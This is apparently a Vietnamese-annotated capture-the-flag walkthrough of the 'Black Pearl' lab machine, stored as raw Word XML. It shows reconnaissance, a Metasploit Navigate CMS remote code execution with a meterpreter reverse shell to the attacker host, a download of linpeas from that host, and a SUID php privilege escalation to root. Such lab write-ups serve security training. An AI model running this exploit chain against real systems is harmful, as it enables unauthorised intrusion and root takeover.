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3688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Black Pearl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August 2, 2022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11:00 PM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-A -p- -T4 192.168.1.11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Starting Nmap 7.92 (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https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) at 2022-08-02 23:55 EDT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scan report for 192.168.1.11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 is up (0.0023s latency).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shown: 65532 closed tcp ports (conn-refused)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PORT   STATE SERVICE VERSION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22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)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ssh-hostkey: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2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)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256 a6:2e:77:71:c6:49:6f:d5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>73:e9:22:7d:8b:1c:a9:c6 (ECDSA)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  256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)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53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)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dns-nsid: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  bind.version: 9.11.5-P4-5.1+deb10u5-Debian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80/tcp open  http    nginx 1.14.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2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|_http-title: Welcome to nginx!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|_http-server-header: nginx/1.14.2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Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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Service detection performed. Please report any incorrect results at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https://nmap.org/sub</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>mit/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> .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done: 1 IP address (1 host up) scanned in 18.72 seconds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ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u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http://192.168.1.11/FUZZ</w:t>
        </w:r>
      </w:hyperlink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secret                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 43ms]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 file secret thì không có thêm thông tin gì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dnsrecon -r 127.0.0/24 -n 192.168.1.11 -d blah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Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255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     PTR blackpearl.tcm 127.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.1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1 Records Found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thêm vhost vào /etc/hosts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ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u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http://blackpearl.tcm/FUZZ</w:t>
        </w:r>
      </w:hyperlink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navigate                [Status: 301, Size: 185, Word</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s: 6, Lines: 8, Duration: 68ms]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vào link navigate thì bi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>t đư</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ợ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c web dùng navigate cms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msfconsole -q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msf6 &gt; search navigate cms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Matching Modules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#  Name                                 Disclosure Date  Rank       Check  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description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 ----                                 ---------------  ----       -----  -----------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0  exploit/multi/http/navigate_cms_rce  2018-09-26       excellent  Yes    Navigate CMS Unauthenticated Remote Code Execution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Interact with a modul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e by name or index. For example info 0, use 0 or use exploit/multi/http/navigate_cms_rce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msf6 &gt; use 0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No payload configured, defaulting to php/meterpreter/reverse_tcp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msf6 exploit(multi/http/navigate_cms_rce) &gt; options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Module options (exploit/multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/http/navigate_cms_rce):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Name       Current Setting  Required  Description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----       ---------------  --------  -----------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Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]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RHOSTS            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">          yes       The target host(s), see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https://github.com/rapid7/metasploit-framework/wi</w:t>
        </w:r>
      </w:hyperlink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ki/Using-Metasploit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RPORT      80               yes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">      The target port (TCP)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SSL        false            no        Negotiate SSL/TLS for outgoing connections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TARGETURI  /navigate/       yes       Base Navigate CMS directory path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VHOST                       no        HTTP server virtual host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Payload options (php/meterpreter/reverse_tcp):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Name   Current Setting  Required  Description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----   ---------------  --------  -----------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LHOST  192.168.1.6      yes       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The listen address (an interface may be specified)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LPORT  4444             yes       The listen port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Exploit target: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Id  Name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--  ----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0   Automatic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msf6 exploit(multi/http/navigate_cms_rce) &gt; set RHOSTS 192.168.1.11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RHOSTS =&gt; 192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.1.11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msf6 exploit(multi/http/navigate_cms_rce) &gt; set VHOST blackpearl.tcm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VHOST =&gt; blackpearl.tcm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msf6 exploit(multi/http/navigate_cms_rce) &gt; run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Started reverse TCP handler on 192.168.1.6:4444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Login bypass successful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Upload successful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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>riggering payload...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Sending stage (39860 bytes) to 192.168.1.11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Meterpreter session 1 opened (192.168.1.6:4444 -&gt; 192.168.1.11:55604 ) at 2022-08-03 02:48:34 -0400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meterpreter &gt; shell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Process 1366 created.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Channel 1 created.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whoami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www-data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python -c 'import pty;pty.spawn("/bin/bash")'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www-data@blackpearl:~/blackpearl.tcm/navigate$ sudo -l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-l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bash: sudo: command not found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Không có quy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n sudo, s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ng linpeas đ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enum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www-data@blackpearl:~/blackpearl.tcm/navigate$ wget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http://192.168.1.6/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink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www-data@blackpearl:~/blackpearl.tcm/navigate$ ./linpeas.sh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SUID - Check easy privesc, exploits and write perms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╚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10" w:anchor="sudo-and-suid" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  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strings Not Found                                    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strace Not Found                                                                                                  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-rwsr-xr-- 1 root messagebus 50K Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                         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-rwsr-xr-x 1 root roo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device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-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign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-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  ---&gt;  BSD/Linux(08-1996)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-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/ne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wgrp  ---&gt;  HP-UX_10.20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-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  ---&gt;  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                           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-rwsr-xr-x 1 root root 4.6M Feb 13  2021 /usr/bin/php7.3 (Unknown SUID binary!)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-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su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-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  ---&gt;  SuSE_9.3/10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-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/pa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sswd  ---&gt;  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                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-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh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-rwsr-xr-x 1 root roo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t 83K Jul 27  2018 /usr/bin/gpasswd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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ặ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c dùng l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nh đ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ki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m tra suid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www-data@blackpearl:~/blackpearl.tcm/navigate$ find / -type f -perm /4000 2&gt;/dev/null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&lt;cm/navigate$ find / -type f -perm /4000 2&gt;/dev/null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/usr/lib/dbus-1.0/dbus-daemon-launch-helper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/usr/lib/eject/dmcrypt-get-device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/usr/lib/openssh/ssh-keysign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/usr/bin/umount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/usr/bin/newgrp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/usr/bin/mount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/usr/bin/php7.3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/usr/bin/su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/usr/bin/chfn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/usr/bin/passwd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/usr/bin/chsh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/usr/bin/gpasswd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Dùng gtfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bins đ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tra c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ứ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>u suid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https://gtfobins.github.io/gtfobins/php/</w:t>
        </w:r>
      </w:hyperlink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ph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ầ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n suid có l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nh tham kh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o như sau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install -m =xs $(which php) .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CMD="/bin/sh"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./php -r "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pcntl_exec('/bin/sh', ['-p']);"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 ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nh l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i đư</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ờ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ng d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ẫ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n php thành như sau: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www-data@blackpearl:~/blackpearl.tcm/navigate$ /usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"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&lt;/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"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whoami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cd root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ls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flag.txt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cat flag.txt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job on this one.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Finding the domain name may have been a little guessy,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but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00B368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85"/>
    <w:rsid w:val="00B3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185D8-E495-4292-90A1-192E9430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pid7/metasploit-framework/w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ackpearl.tcm/FUZZ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11/FUZZ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/php/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/submit/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/linpeas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1107</Words>
  <Characters>6315</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>52</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2023-06-13T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>